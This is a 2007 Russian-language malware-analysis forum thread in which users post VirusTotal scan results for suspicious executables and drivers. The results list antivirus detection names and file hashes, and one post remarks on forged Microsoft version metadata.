AhnLab-V3	2007.7.27.0	2007.07.26	-
AntiVir	7.4.0.50	2007.07.26	-
Authentium	4.93.8	2007.07.25	-
*Avast	4.7.997.0	2007.07.26	Win32:Spyware-gen.*
AVG	7.5.0.476	2007.07.26	-
*BitDefender	7.2	2007.07.26	Application.Cool.Remote.Control.1.2*
CAT-QuickHeal	9.00	2007.07.26	-
ClamAV	0.91	2007.07.26	-
DrWeb	4.33	2007.07.26	-
eSafe	7.0.15.0	2007.07.24	-
eTrust-Vet	31.1.5008	2007.07.26	-
Ewido	4.0	2007.07.26	-
FileAdvisor	1	2007.07.26	-
Fortinet	2.91.0.0	2007.07.26	-
F-Prot	4.3.2.48	2007.07.25	-
F-Secure	6.70.13030.0	2007.07.26	-
Ikarus	T3.1.1.8	2007.07.26	-
Kaspersky	4.0.2.24	2007.07.26	-
McAfee	5084	2007.07.26	-
*Microsoft	1.2704	2007.07.26	RemoteAccess:Win32/CoolRemoteControl*
NOD32v2	2423	2007.07.26	-
Norman	5.80.02	2007.07.26	-
*Panda	9.0.0.4	2007.07.26	Generic Malware*
Rising	19.33.32.00	2007.07.26	-
Prevx1	V2	2007.07.26	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.26	-
Symantec	10	2007.07.26	-
TheHacker	6.1.7.154	2007.07.26	-
VBA32	3.12.2.1	2007.07.24	-
VirusBuster	4.3.26:9	2007.07.26	-
Webwasher-Gateway	6.5.3	2007.07.26	-
Additional information
File size: 29184 bytes
MD5: 28ff05b83f852ed13bc49f50945651ea
SHA1: 69605f13837c698ca323484fab46bc11146acdb4

----------


## Winsent

File 1.scr received on 07.27.2007 16:12:33 (CET)


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.7.28.0	2007.07.27	-
*AntiVir	7.4.0.50	2007.07.27	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.27	-
AVG	7.5.0.476	2007.07.27	-
*BitDefender	7.2	2007.07.27	Trojan.PWS.LDPinch.TAW
CAT-QuickHeal	9.00	2007.07.26	(Suspicious) - DNAScan*
ClamAV	0.91	2007.07.27	-
DrWeb	4.33	2007.07.27	-
*eSafe	7.0.15.0	2007.07.24	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5008	2007.07.26	-
Ewido	4.0	2007.07.27	-
FileAdvisor	1	2007.07.27	-
Fortinet	2.91.0.0	2007.07.27	-
F-Prot	4.3.2.48	2007.07.27	-
*F-Secure	6.70.13030.0	2007.07.27	Packed.Win32.PolyCrypt.b
Ikarus	T3.1.1.8	2007.07.27	Trojan-Downloader.Win32.Small.cyn
Kaspersky	4.0.2.24	2007.07.27	Packed.Win32.PolyCrypt.b*
McAfee	5084	2007.07.26	-
*Microsoft	1.2704	2007.07.27	Trojan:Win32/Anomaly.gen!A*
NOD32v2	2425	2007.07.27	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.27	-
*Rising	19.33.42.00	2007.07.27	Packer.RyCrypt
Sophos	4.19.0	2007.07.26	Mal/Basine-C*
Sunbelt	2.2.907.0	2007.07.26	-
Symantec	10	2007.07.27	-
TheHacker	6.1.7.155	2007.07.27	-
VBA32	3.12.2.1	2007.07.27	-
*VirusBuster	4.3.26:9	2007.07.27	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.07.27	Trojan.Crypt.XPACK.Gen*
Additional information
File size: 25743 bytes
MD5: 10561044f4cc7d87c8ca4631ecc23fb7
SHA1: 2a8ff74ff2b208178bd7978969a5e0a6c573104f

----------


## drongo

T-11377


```
 File avz00007.dta received on 07.27.2007 18:36:32 (CET)
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.28.0	2007.07.27	-
AntiVir	7.4.0.50	2007.07.27	HEUR/Crypted
Authentium	4.93.8	2007.07.27	Possibly a new variant of W32/Threat-HLLSI-based!Maximus
Avast	4.7.997.0	2007.07.27	-
AVG	7.5.0.476	2007.07.27	PSW.Generic5.KY
BitDefender	7.2	2007.07.27	Trojan.PWS.Goldun.SYT
CAT-QuickHeal	9.00	2007.07.26	-
ClamAV	0.91	2007.07.27	-
DrWeb	4.33	2007.07.27	Trojan.PWS.GoldSpy
eSafe	7.0.15.0	2007.07.24	suspicious Trojan/Worm
eTrust-Vet	31.1.5008	2007.07.26	-
Ewido	4.0	2007.07.27	-
FileAdvisor	1	2007.07.27	-
Fortinet	2.91.0.0	2007.07.27	Dowdec!tr
F-Prot	4.3.2.48	2007.07.27	W32/Threat-HLLSI-based!Maximus
F-Secure	6.70.13030.0	2007.07.27	Trojan-Spy.Win32.Goldun.pc
Ikarus	T3.1.1.8	2007.07.27	Trojan-PWS.Goldun.SYT
Kaspersky	4.0.2.24	2007.07.27	Trojan-Spy.Win32.Goldun.pc
McAfee	5084	2007.07.26	-
Microsoft	1.2704	2007.07.27	-
NOD32v2	2425	2007.07.27	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.27	Dialer.KMO
Rising	19.33.42.00	2007.07.27	-
Sophos	4.19.0	2007.07.26	Troj/Dowdec-Gen
Sunbelt	2.2.907.0	2007.07.26	VIPRE.Suspicious
Symantec	10	2007.07.27	-
TheHacker	6.1.7.155	2007.07.27	-
VBA32	3.12.2.1	2007.07.27	suspected of Downloader.Small.33
VirusBuster	4.3.26:9	2007.07.27	-
Webwasher-Gateway	6.0.1	2007.07.27	Heuristic.Crypted
Additional information
File size: 11776 bytes
MD5: 8c9584c8b6606b137ac0bcc2bcf16e0b
SHA1: c60eb19bd704436755f20ab1d6069cafce4050bc
packers: UPX
packers: UPX
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.
```

----------


## Синауридзе Александр

File loader.exe received on 07.28.2007 14:59:45 (CET)

Antivirus Version Last Update Result 
AhnLab-V3 2007.7.28.0 2007.07.27 - 
*AntiVir 7.4.0.50 2007.07.27 TR/Dldr.Small.exz*
Authentium 4.93.8 2007.07.27 - 
*Avast 4.7.997.0 2007.07.27 Win32:Tiny-HD*
*AVG 7.5.0.476 2007.07.27 Downloader.Generic5.GEJ*
*BitDefender 7.2 2007.07.28 Generic.Malware.dld!!.927334E4*
CAT-QuickHeal 9.00 2007.07.28 - 
ClamAV 0.91 2007.07.28 - 
*DrWeb 4.33 2007.07.28 DLOADER.Trojan*
*eSafe 7.0.15.0 2007.07.24 Suspicious Trojan/Worm*
*eTrust-Vet 31.1.5010 2007.07.28 Win32/Shadown.A* 
Ewido 4.0 2007.07.28 - 
FileAdvisor 1 2007.07.28 - 
*Fortinet 2.91.0.0 2007.07.28 Heuri.E* 
*F-Prot 4.3.2.48 2007.07.27 W32/Downloader-Sml-based!Maximus*
*F-Secure 6.70.13030.0 2007.07.27 Trojan-Downloader.Win32.Small.exz*
*Ikarus T3.1.1.8 2007.07.28 Win32.SuspectCrc*
*Kaspersky 4.0.2.24 2007.07.28 Trojan-Downloader.Win32.Small.exz*
McAfee 5085 2007.07.27 - 
Microsoft 1.2704 2007.07.28 - 
*NOD32v2 2426 2007.07.27 probably unknown NewHeur_PE virus*
*Norman 5.80.02 2007.07.27 W32/Downloader*
*Panda 9.0.0.4 2007.07.28 Generic Malware*
*Rising 19.33.52.00 2007.07.28 Trojan.DL.Tiny.ab*
*Sophos 4.19.0 2007.07.26 Mal/Heuri-E* 
*Sunbelt 2.2.907.0 2007.07.28 Trojan-Downloader.Win32.Small.exz*
Symantec 10 2007.07.28 - 
*TheHacker 6.1.7.155 2007.07.28 Trojan/Downloader.Small.exz*
*VBA32 3.12.2.1 2007.07.27 Trojan-Downloader.Win32.Small.exz*
VirusBuster 4.3.26:9 2007.07.27 - 
*Webwasher-Gateway 6.0.1 2007.07.28 Trojan.Dldr.Small.exz*

Additional information 
File size: 1020 bytes 
MD5: 06ade3c8d40cd6cd2e0a4f8a3ab8acac 
SHA1: f181e447edb61f1cad1fa3fe3492890b382179d0

----------


## ISO

File FG.EXE received on 07.30.2007 07:22:31 (CET)
Current status: finished
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.28.0	2007.07.27	-
AntiVir	7.4.0.50	2007.07.30	-
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.30	-
CAT-QuickHeal	9.00	2007.07.28	-
ClamAV	0.91	2007.07.30	-
DrWeb	4.33	2007.07.30	-
*eSafe	7.0.15.0	2007.07.29	suspicious Trojan/Worm*
eTrust-Vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.29	-
FileAdvisor	1	2007.07.30	-
Fortinet	2.91.0.0	2007.07.30	-
F-Prot	4.3.2.48	2007.07.27	-
F-Secure	6.70.13030.0	2007.07.30	-
*Ikarus	T3.1.1.8	2007.07.29	Backdoor.Win32.Delf.apa*
Kaspersky	4.0.2.24	2007.07.30	-
McAfee	5085	2007.07.27	-
Microsoft	1.2704	2007.07.30	-
NOD32v2	2428	2007.07.30	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.29	-
Rising	19.34.00.00	2007.07.30	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.28	-
Symantec	10	2007.07.30	-
TheHacker	6.1.7.158	2007.07.30	-
VBA32	3.12.2.1	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.29	-
*Webwasher-Gateway	6.0.1	2007.07.30	Win32.ModifiedUPX.gen!90 (suspicious)*
Additional information
File size: 387584 bytes
MD5: bf32d217b7c5ee975e5a41cb7b9f24d4
SHA1: 7418ff18d07a64f81f0ef259e2cc391ceb062fa7
packers: UPX
packers: UPX
packers: UPX

----------


## Winsent

File sms.exe received on 07.31.2007 07:49:38 (CET)


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.7.31.1	2007.07.31	-
*AntiVir	7.4.0.54	2007.07.30	HEUR/Crypted*
Authentium	4.93.8	2007.07.30	-
Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
*BitDefender	7.2	2007.07.31	Trojan.PWS.LDPinch.TAW*
CAT-QuickHeal	9.00	2007.07.30	-
ClamAV	0.91	2007.07.31	-
DrWeb	4.33	2007.07.31	-
eSafe	7.0.15.0	2007.07.29	-
eTrust-Vet	31.1.5018	2007.07.31	-
Ewido	4.0	2007.07.30	-
FileAdvisor	1	2007.07.31	-
Fortinet	2.91.0.0	2007.07.31	-
F-Prot	4.3.2.48	2007.07.30	-
F-Secure	6.70.13030.0	2007.07.31	-
Ikarus	T3.1.1.8	2007.07.31	-
Kaspersky	4.0.2.24	2007.07.31	-
*McAfee	5086	2007.07.30	New Malware.ek*
Microsoft	1.2704	2007.07.30	-
NOD32v2	2429	2007.07.30	-
*Norman	5.80.02	2007.07.30	Suspicious_P.gen*
Panda	9.0.0.4	2007.07.31	-
Prevx1	V2	2007.07.31	-
Rising	19.34.11.00	2007.07.31	-
*Sophos	4.19.0	2007.07.26	Mal/Basine-C
Sunbelt	2.2.907.0	2007.07.31	VIPRE.Suspicious*
Symantec	10	2007.07.31	-
TheHacker	6.1.7.159	2007.07.31	-
VBA32	3.12.2.2	2007.07.30	-
*VirusBuster	4.3.26:9	2007.07.30	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.07.31	Heuristic.Crypted*

----------


## Shu_b

t=11364 (checked yesterday)



```
 File nso12k.sys received on 07.30.2007 09:46:16 (CET)
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.28.0	2007.07.30	-
AntiVir	7.4.0.50	2007.07.30	-
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.30	Win32:Agent-JKC
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.30	-
CAT-QuickHeal	9.00	2007.07.28	-
ClamAV	0.91	2007.07.30	-
DrWeb	4.33	2007.07.30	-
eSafe	7.0.15.0	2007.07.29	-
eTrust-Vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.29	-
FileAdvisor	1	2007.07.30	-
Fortinet	2.91.0.0	2007.07.30	-
F-Prot	4.3.2.48	2007.07.27	-
F-Secure	6.70.13030.0	2007.07.30	-
Ikarus	T3.1.1.8	2007.07.30	Trojan.Win32.Agent.AMR
Kaspersky	4.0.2.24	2007.07.30	-
McAfee	5085	2007.07.27	New Malware.z
Microsoft	1.2704	2007.07.30	-
NOD32v2	2428	2007.07.30	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.29	Rootkit/Agent.GAC
Prevx1	V2	2007.07.30	-
Rising	19.34.01.00	2007.07.30	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.28	-
Symantec	10	2007.07.30	Hacktool.Rootkit
TheHacker	6.1.7.158	2007.07.30	-
VBA32	3.12.2.1	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.29	-
Webwasher-Gateway	6.0.1	2007.07.30	-
Additional information
File size: 4064 bytes
MD5: f86bcf371145c026fdc403480f495c44
SHA1: 3ac546cd4ea0a5bce316f0cc28ac7f1b7ce1bf00
```




```
 File cssrss.exe received on 07.30.2007 09:46:30 (CET)
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.7.28.0	2007.07.30	-
AntiVir	7.4.0.50	2007.07.30	HEUR/Crypted
Authentium	4.93.8	2007.07.27	-
Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.30	-
CAT-QuickHeal	9.00	2007.07.28	(Suspicious) - DNAScan
ClamAV	0.91	2007.07.30	-
DrWeb	4.33	2007.07.30	-
eSafe	7.0.15.0	2007.07.29	suspicious Trojan/Worm
eTrust-Vet	31.1.5010	2007.07.28	-
Ewido	4.0	2007.07.29	-
FileAdvisor	1	2007.07.30	-
Fortinet	2.91.0.0	2007.07.30	-
F-Prot	4.3.2.48	2007.07.27	-
F-Secure	6.70.13030.0	2007.07.30	-
Ikarus	T3.1.1.8	2007.07.30	-
Kaspersky	4.0.2.24	2007.07.30	-
McAfee	5085	2007.07.27	-
Microsoft	1.2704	2007.07.30	-
NOD32v2	2428	2007.07.30	-
Norman	5.80.02	2007.07.27	-
Panda	9.0.0.4	2007.07.29	Trj/Agent.GAD
Rising	19.34.01.00	2007.07.30	-
Prevx1	V2	2007.07.30	-
Sophos	4.19.0	2007.07.26	-
Sunbelt	2.2.907.0	2007.07.28	VIPRE.Suspicious
Symantec	10	2007.07.30	-
TheHacker	6.1.7.158	2007.07.30	-
VBA32	3.12.2.1	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.29	-
Webwasher-Gateway	6.0.1	2007.07.30	Heuristic.Crypted
Additional information
File size: 15752 bytes
MD5: 62f716218dbfac6dbafc0a94117af899
SHA1: c883ed07aae8df7109742b069ba7a3fe85e8ec22
```

 Kaspersky Anti-Virus  	
Found Trojan-Downloader.Win32.Agent.bnz, Trojan.Win32.Agent.amr 
 Dr.Web  	
Found Trojan.NtRootKit.323, Trojan.NtRootKit.322

----------



## yu_mor

File navu32.exe received on 07.31.2007 08:27:56 (CET)
Current status:    finished 

Antivirus	Version	Last Update	Result
AhnLab-V3	2007.7.31.1	2007.07.31	-
*AntiVir	7.4.0.54	2007.07.30	HEUR/Crypted*
*Authentium	4.93.8	2007.07.30	Possibly a new variant of W32/Threat-SysVenFakU-based!Maximus*
Avast	4.7.997.0	2007.07.30	-
AVG	7.5.0.476	2007.07.30	-
BitDefender	7.2	2007.07.31	-
*CAT-QuickHeal	9.00	2007.07.30	(Suspicious) - DNAScan*
ClamAV	0.91	2007.07.31	-
DrWeb	4.33	2007.07.31	-
*eSafe	7.0.15.0	2007.07.29	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5018	2007.07.31	-
Ewido	4.0	2007.07.30	-
FileAdvisor	1	2007.07.31	-
Fortinet	2.91.0.0	2007.07.31	-
*F-Prot	4.3.2.48	2007.07.30	W32/Threat-SysVenFakU-based!Maximus*
F-Secure	6.70.13030.0	2007.07.31	-
*Ikarus	T3.1.1.8	2007.07.31	Trojan-Downloader.Win32.Zlob.and*
Kaspersky	4.0.2.24	2007.07.31	-
*McAfee	5086	2007.07.30	New Malware.aj*
Microsoft	1.2704	2007.07.31	-
NOD32v2	2429	2007.07.30	-
*Norman	5.80.02	2007.07.30	W32/Suspicious_U.gen*
*_Panda	9.0.0.4	2007.07.31	Suspicious file_*
Prevx1	V2	2007.07.31	-
Rising	19.34.11.00	2007.07.31	-
*Sophos	4.19.0	2007.07.26	Mal/Packer*
Sunbelt	2.2.907.0	2007.07.31	-
Symantec	10	2007.07.31	-
TheHacker	6.1.7.159	2007.07.31	-
VBA32	3.12.2.2	2007.07.30	-
VirusBuster	4.3.26:9	2007.07.30	-
*Webwasher-Gateway	6.0.1	2007.07.31	Heuristic.Crypted*
Additional information
File size: 62826 bytes
MD5: c558cf168f705122af62aa561f1e05f2
SHA1: ad14017668f81d6de0d515378590c010da383688
packers: UPACK

strange:
File Version Information : 
Company Name		:  Microsoft Corporation
File Description		:  NetWork Monitor Control
File Version		:  5.0.2134.1
Internal Name		:  navu32.exe
Legal Copyright		:  Copyright (C) Microsoft Corp. 1991-2001
Original Filename	:  navu32.exe
Product Name		:  Microsoft(R) Windows (R) 2000 Operating System
Product Version		:  5.0.2195.3649
Comments		:  
Legal Trademarks	:  Microsoft(R) is a registered trademark of Microsoft Corporation in the U.S. and/or other countries.
Private Build		:  
Special Build		:  

Creation Date		: 30/07/2007  17:50:14 
Last Modif. Date		: 10/01/2000  16:00:00 
Last Access Date	: 31/07/2007  00:00:00 
FileSize			: 62826 bytes ( 61.354 KB,  0.060 MB ) 
FileVersionInfoSize	: 2396 bytes  
File type		: Application (0x1) 
Target OS		: Win32 API (Windows NT) (0x40004) 
File/Product version	: 5.0.2195.3649 / 5.0.2195.3649
Language 		: Английский (США) (0x409)
Character Set		: (0x4B0)

----------


## Muzzle

from the thread http://virusinfo.info/showthread.php?t=11425
*C:\Windows\System32\Check.exe*



> AhnLab-V3	2007.7.31.1	2007.08.01	-
> AntiVir	7.4.0.54	2007.07.31	-
> Authentium	4.93.8	2007.07.31	-
> Avast	4.7.1029.0	2007.07.31	-
> AVG	7.5.0.476	2007.07.31	-
> BitDefender	7.2	2007.08.01	-
> CAT-QuickHeal	9.00	2007.07.31	-
> ClamAV	0.91	2007.08.01	-
> DrWeb	4.33	2007.07.31	-
> ...


and Kaspersky will detect it as *Trojan-PSW.Win32.WOW.lq* after the database update.

----------


## yu_mor

File sysdrv9.exe received on 08.01.2007 13:40:48 (CET)
Current status:   finished 
Result: 5/32 (15.63%) 
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.2.0	2007.08.01	-
AntiVir	7.4.0.54	2007.08.01	-
Authentium	4.93.8	2007.07.31	could be a corrupted executable file
Avast	4.7.1029.0	2007.08.01	-
AVG	7.5.0.476	2007.07.31	-
BitDefender	7.2	2007.08.01	-
CAT-QuickHeal	9.00	2007.07.31	-
ClamAV	0.91	2007.08.01	-
DrWeb	4.33	2007.08.01	-
*eSafe	7.0.15.0	2007.07.31	suspicious Trojan/Worm*
eTrust-Vet	31.1.5022	2007.08.01	-
Ewido	4.0	2007.08.01	-
FileAdvisor	1	2007.08.01	-
Fortinet	2.91.0.0	2007.08.01	-
F-Prot	4.3.2.48	2007.07.31	-
*F-Secure	6.70.13030.0	2007.08.01	Trojan-Spy.Win32.Small.gv*
Ikarus	T3.1.1.8	2007.08.01	-
*Kaspersky	4.0.2.24	2007.08.01	Trojan-Spy.Win32.Small.gv*
McAfee	5087	2007.07.31	-
Microsoft	1.2704	2007.08.01	-
NOD32v2	2430	2007.07.31	-
Norman	5.80.02	2007.07.31	-
Panda	9.0.0.4	2007.08.01	-
Prevx1	V2	2007.08.01	-
Rising	19.34.22.00	2007.08.01	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.07.31	-
Symantec	10	2007.08.01	-
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.07.31	-
VirusBuster	4.3.26:9	2007.07.31	-
*Webwasher-Gateway	6.0.1	2007.08.01	Win32.Malware.dam (suspicious)*
Additional information
File size: 11895 bytes
MD5: a9aa11fe83fd5802a6064047dd7e940d
SHA1: d85f431154e43293a795a31912e53466322082d7

Complete scanning result of "googletoolbar1.dll", processed in VirusTotal at 08/02/2007 08:17:54 (CET).

[ file data ]
* name: googletoolbar1.dll
* size: 19968
* md5.: 76346c994571a4dab5b3904a61afd3d4
* sha1: dfc84eed7e817e1b29411a4a54c202bfe51f40c9

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
*AntiVir	7.4.0.54/20070801	found [TR/BHO.Agent.19968]*
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070801	found nothing
eSafe	7.0.15.0/20070731	found nothing
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
*F-Secure	6.70.13030.0/20070802	found [Trojan.Win32.Agent.aun]*
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
Ikarus	T3.1.1.8/20070802	found nothing
*Kaspersky	4.0.2.24/20070802	found [Trojan.Win32.Agent.aun]*
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
*Norman	5.80.02/20070801	found [W32/Horst.gen25]*
*Panda	9.0.0.4/20070802	found [Suspicious file]*
Rising	19.34.30.00/20070802	found nothing
*Sophos	4.19.0/20070801	found [Mal/Behav-004]*
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Trojan.BHO.Agent.19968]*

Complete scanning result of "sysdrv2.exe", processed in VirusTotal at 08/02/2007 08:11:20 (CET).

[ file data ]
* name: sysdrv2.exe
* size: 3616
* md5.: 8e2817e1b7fb2fbf2adb90ceab97f9c2
* sha1: f519a9b16d7265e6d385e1d24f9e7241eedc97ae

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
AntiVir	7.4.0.54/20070801	found nothing
*Authentium	4.93.8/20070802	found [W32/Downldr2.AJMZ]*
*Avast	4.7.1029.0/20070801	found [Win32:Agent-ITC]*
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
*ClamAV	0.91/20070801	found [Trojan.Downloader-10584]*
DrWeb	4.33/20070801	found nothing
*eSafe	7.0.15.0/20070731	found [Suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
*F-Prot	4.3.2.48/20070801	found [W32/Downldr2.AJMZ]*
*F-Secure	6.70.13030.0/20070802	found [Trojan-Downloader.Win32.Agent.bvl]*
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan-Downloader.Win32.Agent.bvl]*
*Kaspersky	4.0.2.24/20070802	found [Trojan-Downloader.Win32.Agent.bvl]*
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Prevx1	V2/20070802	found nothing
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
*VBA32	3.12.2.2/20070801	found [Trojan-Downloader.Win32.Agent.bvl]*
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.Malware.dam (suspicious)]*

Complete scanning result of "sysdrv4.exe", processed in VirusTotal at 08/02/2007 08:10:46 (CET).

[ file data ]
* name: sysdrv4.exe
* size: 3616
* md5.: 264c9fe6ea9caf2d1159a41d44d4eab2
* sha1: 444ea4a9b0fbbef9ce4a01542dc7dae30d0230d8

[ scan result ]
AhnLab-V3	2007.8.2.0/20070802	found nothing
AntiVir	7.4.0.54/20070801	found nothing
Authentium	4.93.8/20070802	found nothing
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
*CAT-QuickHeal	9.00/20070801	found [(Suspicious) - DNAScan]*
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070801	found nothing
*eSafe	7.0.15.0/20070731	found [suspicious Trojan/Worm]*
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
*Ikarus	T3.1.1.8/20070802	found [Trojan-Downloader.Win32.Small.ckj]*
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found [unpack error]
*Norman	5.80.02/20070801	found [Suspicious_F.gen]*
*Panda	9.0.0.4/20070802	found [Suspicious file]*
Prevx1	V2/20070802	found nothing
*Rising	19.34.30.00/20070802	found [Backdoor.Win32.Small.ls]*
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.Malware.gen#FSG (suspicious)]*

Complete scanning result of "~.exe", processed in VirusTotal at 08/02/2007 08:09:17 (CET).

[ file data ]
* name: ~.exe
* size: 2228
* md5.: aff86add4004a101f914be6f0581769c
* sha1: 1fc74362f9df55ee54c0c9283fc6aae397aa7842

[ scan result ]
 AhnLab-V3	2007.8.2.0/20070802	found nothing
AntiVir	7.4.0.54/20070801	found nothing
Authentium	4.93.8/20070802	found [could be a corrupted executable file]
Avast	4.7.1029.0/20070801	found nothing
AVG	7.5.0.476/20070801	found nothing
BitDefender	7.2/20070802	found nothing
CAT-QuickHeal	9.00/20070801	found nothing
ClamAV	0.91/20070801	found nothing
DrWeb	4.33/20070801	found nothing
eSafe	7.0.15.0/20070731	found nothing
eTrust-Vet	31.1.5024/20070801	found nothing
Ewido	4.0/20070801	found nothing
F-Prot	4.3.2.48/20070801	found nothing
F-Secure	6.70.13030.0/20070802	found nothing
FileAdvisor	1/20070802	found nothing
Fortinet	2.91.0.0/20070802	found nothing
Ikarus	T3.1.1.8/20070802	found nothing
Kaspersky	4.0.2.24/20070802	found nothing
McAfee	5088/20070801	found nothing
Microsoft	1.2704/20070802	found nothing
NOD32v2	2431/20070801	found nothing
Norman	5.80.02/20070801	found nothing
Panda	9.0.0.4/20070802	found nothing
Rising	19.34.30.00/20070802	found nothing
Sophos	4.19.0/20070801	found nothing
Sunbelt	2.2.907.0/20070802	found nothing
Symantec	10/20070802	found nothing
TheHacker	6.1.7.160/20070801	found nothing
VBA32	3.12.2.2/20070801	found nothing
VirusBuster	4.3.26:9/20070801	found nothing
*Webwasher-Gateway	6.0.1/20070802	found [Win32.Malware.dam (suspicious)]*

----------


## V_Bond

```
AhnLab-V3	2007.8.2.0	2007.08.01	-
AntiVir	7.4.0.54	2007.08.01	TR/Crypt.XPACK.Gen
Authentium	4.93.8	2007.07.31	-
Avast	4.7.1029.0	2007.08.01	-
AVG	7.5.0.476	2007.07.31	-
BitDefender	7.2	2007.08.01	-
CAT-QuickHeal	9.00	2007.07.31	(Suspicious) - DNAScan
ClamAV	0.91	2007.08.01	-
DrWeb	4.33	2007.08.01	-
eSafe	7.0.15.0	2007.07.31	-
eTrust-Vet	31.1.5022	2007.08.01	-
Ewido	4.0	2007.08.01	-
FileAdvisor	1	2007.08.01	-
Fortinet	2.91.0.0	2007.08.01	-
F-Prot	4.3.2.48	2007.07.31	-
F-Secure	6.70.13030.0	2007.08.01	-
Ikarus	T3.1.1.8	2007.08.01	-
Kaspersky	4.0.2.24	2007.08.01	-
McAfee	5087	2007.07.31	-
Microsoft	1.2704	2007.08.01	PWS:Win32/Bankrypt.gen
NOD32v2	2430	2007.07.31	-
Norman	5.80.02	2007.07.31	-
Panda	9.0.0.4	2007.08.01	Suspicious file
Prevx1	V2	2007.08.01	-
Rising	19.34.22.00	2007.08.01	-
Sophos	4.19.0	2007.08.01	-
Sunbelt	2.2.907.0	2007.07.31	VIPRE.Suspicious
Symantec	10	2007.08.01	-
TheHacker	6.1.7.160	2007.08.01	-
VBA32	3.12.2.2	2007.07.31	-
VirusBuster	4.3.26:9	2007.08.01	-
Webwasher-Gateway	6.0.1	2007.08.01	Trojan.Crypt.XPACK.Gen
Additional information
File size: 478208 bytes
MD5: 58cb2f0941876bf115ebe49cfdbb8c78
SHA1: 33d8624006e512915ebaa5dbf50c12e47eb03b95
```

----------


## yu_mor

simply awful!
Complete scanning result of "603-a[1].exe", processed in VirusTotal at 08/02/2007 09:40:40 (CET).

[ file data ]
* name: 603-a[1].exe
* size: 31232
* md5.: 757dfe2127314a1473ed0392b06174e6
* sha1: 774ac812b505d57c7b958ee06cebb978ee86d1ba

[ scan result ]
 AhnLab-V3	2007.8.2.0/20070802	found nothing
